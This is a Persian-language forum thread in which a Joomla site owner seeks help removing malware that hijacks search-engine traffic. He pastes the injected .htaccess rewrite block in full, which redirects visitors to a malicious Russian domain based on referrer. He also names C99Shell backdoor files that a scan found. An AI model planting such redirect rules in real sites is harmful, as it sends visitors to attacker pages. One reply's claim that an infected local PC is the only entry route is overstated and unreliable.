hamidsajjadieh

حذف تروجان از هاست - جوملا

12 پست در این موضوع

با سلام

بنده چند ماهی هست که یه سایت راه اندازی کردم

وقتی توی گوگل یا یاهو و ... یکی از صفحات سایتو سرچ میکنم آدرسو میاره ولی وقتی روش کلیک میکنم به این آدرس دایرکت میشه :

http://confemed.ru/sunreal?9

البته آگه آدرسو دستی بزنم سایت باز میشه ولی تو موتورهای جستجو به اون آدرسی که نوشتم میره

یکم تحقیق کردم و فهمیدم که تو هاست من یه تروجان قرار گرفته به نام

BLACKLISTED:35

این اطلاعاتو از سایت معتبر www.sucuri.net گرفتم

خود این سایت هاست منو اسکن کرد و بهم گفت که این تروجان روشه

کار این تروجان به این صورته که میاد و فایل .htaccess را دستکاری میکنه و این قسمتو بهش اضافه میکنه

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://confemed.ru/sunreal?9 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://confemed.ru/sunreal?9 [R=301,L]

</IfModule>

این کار باعث میشه که موتورهای جستجو سایت منو به آدرس http://confemed.ru/sunreal?9 ریدایرکت کنند

حتی اگه باز من این فایلو تصحیح کنم بعد از حدود 20 دقیقه دوباره این قسمت به فایل اضافه میشه

سوالم اینه که :

1- با وجودی که کن پرمیشن این فایلو روی 444 تنظیم کردم چطور میتونه اونو تغییر بده؟

2- چطوری میشه این تروجانو حذف کنم؟

از بزرگان و اساتید محترم میخوام که جوابگو باشند

خیلی خیلی متشکرم

ویرایش شده در توسط hamidsajjadieh

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

خوب برای این کار شما باید درون هاست خود رو جستجو کنید بخصوص درون فایلهای index و Defult که ببینید سورس اضافه در ونشون اضافه نشده.

که بهترین راهش اینه که رویه سیستم خود کسپر اسکای نصب کنید و هاستتون رو دانلود کنید و با آنتی ویروس هم چک کنید که بعد از پاکسازی به مدیر سرور بگین تا کل هاست شما رو حذف و دوباره ایجاد نماید تا اگر در روت هاست دستورات شل وجود داشته باشه حذف بشه.

در آخر بصورت دستی ریستوری نمایید.

Share this post


Link to post
Share on other sites
خوب برای این کار شما باید درون هاست خود رو جستجو کنید بخصوص درون فایلهای index و Defult که ببینید سورس اضافه در ونشون اضافه نشده.

که بهترین راهش اینه که رویه سیستم خود کسپر اسکای نصب کنید و هاستتون رو دانلود کنید و با آنتی ویروس هم چک کنید که بعد از پاکسازی به مدیر سرور بگین تا کل هاست شما رو حذف و دوباره ایجاد نماید تا اگر در روت هاست دستورات شل وجود داشته باشه حذف بشه.

در آخر بصورت دستی ریستوری نمایید.

دوست عزیز آیا آنتی ویروس میتونه در بین کدهای پی اچ پی تروجان رو پیدا و اونو حذف کنه؟

آیا روشی که شما گفته اید در عمل جواب میده؟

Share this post


Link to post
Share on other sites

بله

کسپر اسکای درون تمام فایلها رو نگاه می کنه و در صورتی که نتونه حذف کنه اون فایل رو خطا میگیره و شما با ادیت کردن می تونید مشکل رو برطرف کنید.

مثلا الان سایتهایی که شل دارن رو با کسپر باز کنید می بینید خطا میده و اجازه باز شدن سایت رو نمیده و اسم شل رو بهتون میده که از چه نوعی هست و چکار می کنه.

این مشکل تنها یک راه داره که وارد سایت میشه:

ویروسی بودن سیستم

پس همیشه از سیستم خودتون اطمینان پیدا کنید بعد به آپدیت سایت بپردازید

Share this post


Link to post
Share on other sites
بله

کسپر اسکای درون تمام فایلها رو نگاه می کنه و در صورتی که نتونه حذف کنه اون فایل رو خطا میگیره و شما با ادیت کردن می تونید مشکل رو برطرف کنید.

مثلا الان سایتهایی که شل دارن رو با کسپر باز کنید می بینید خطا میده و اجازه باز شدن سایت رو نمیده و اسم شل رو بهتون میده که از چه نوعی هست و چکار می کنه.

این مشکل تنها یک راه داره که وارد سایت میشه:

ویروسی بودن سیستم

پس همیشه از سیستم خودتون اطمینان پیدا کنید بعد به آپدیت سایت بپردازید

ممنون ازتون

من یه بک آپ میگیرم و اونو دانلود میکنم و بعدش با کسپر چک میکنم ببینم چه اتفاقی میافتد

نتیجه را در همین جا اعلام میکنم تا اگه کسی به این مشکل دچار شد بدونه که چکار کنه

از همه شما دوستان ممنون

Share this post


Link to post
Share on other sites

دوستان من از هاستم بک آپ گرفتم و اونو با کسپر اسکن کردم . 3 تا مورد پیدا کرد به نام Backdoor.PHP.C99Shell.cn که در Public_html/tmp/mod_spo654654654/air.php و Public_html/tmp/mod_spo654654654/air.txt1 و Public_html/tmp/mod_spo654654654/air.txt2 قرار دارند . ولی ظاهرا آنتی ویروس من نتونتس پاکسازی کنه.

حالا به نظر شما من برم توی هاست و کلا هر چی تو فولدر tmp هست رو پاک کنم؟

یا بگردم با یه آنتی ویروس بروز فایل بک آپ رو اسکن و پاکسازی و در آخر اونو تو هاست آپلود کنم و دوباره نصب کنم؟

Share this post


Link to post
Share on other sites

دوستان عزیز

خواهش میکنم همه توجه کنید

ماژول simple page option یه ماژولی است که آلوده به تروجانه

از بزرگان این سایت خواهش دارم که در این مورد تحقیق کنند و نتیجه را به همه اعلام کنند تا کسی با مشکلی شبیه به من مواجه نشه

در ضمن این ماژول ایمیلهای جعلی زیادی را در غیاب شما در سراسر اینترنت پخش میکنه .

از همه شماها ممنونم

Share this post


Link to post
Share on other sites

دوست عزیز این ویروسی که گرفتید سه دلیل معمولا دارد

1- پسورد ادمین شما بسیار راحت است که توانسته اند هک کنند و سپس از مدیریت شل آپلود کنند

2-اگر سیستمی از پرتال جوملا استفاده می کنید اگر افزونه ای رایگان دریافت می کنید مطمئن شوید که افزونه شل ندارد

3- هاستینگ و سرور ضعیفی دارید که پیشنهاد می شود اگر اینگونه است تغییر سرویس دهید..

موفق باشیدgift

Share this post


Link to post
Share on other sites

دوست من شما فایلهای index.htm و index.php رو هم ویرایش کنید و ببینید دستورات ناشناسی توشون نیست.

سعی کنید کلمه عبور رو تلفیقی از عدد و حروف و علائم بدین و رویه پوشه ادمین پسورد بزارین.

Share this post


Link to post
Share on other sites

دوست من شما فایلهای index.htm و index.php رو هم ویرایش کنید و ببینید دستورات ناشناسی توشون نیست.

سعی کنید کلمه عبور رو تلفیقی از عدد و حروف و علائم بدین و رویه پوشه ادمین پسورد بزارین.

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری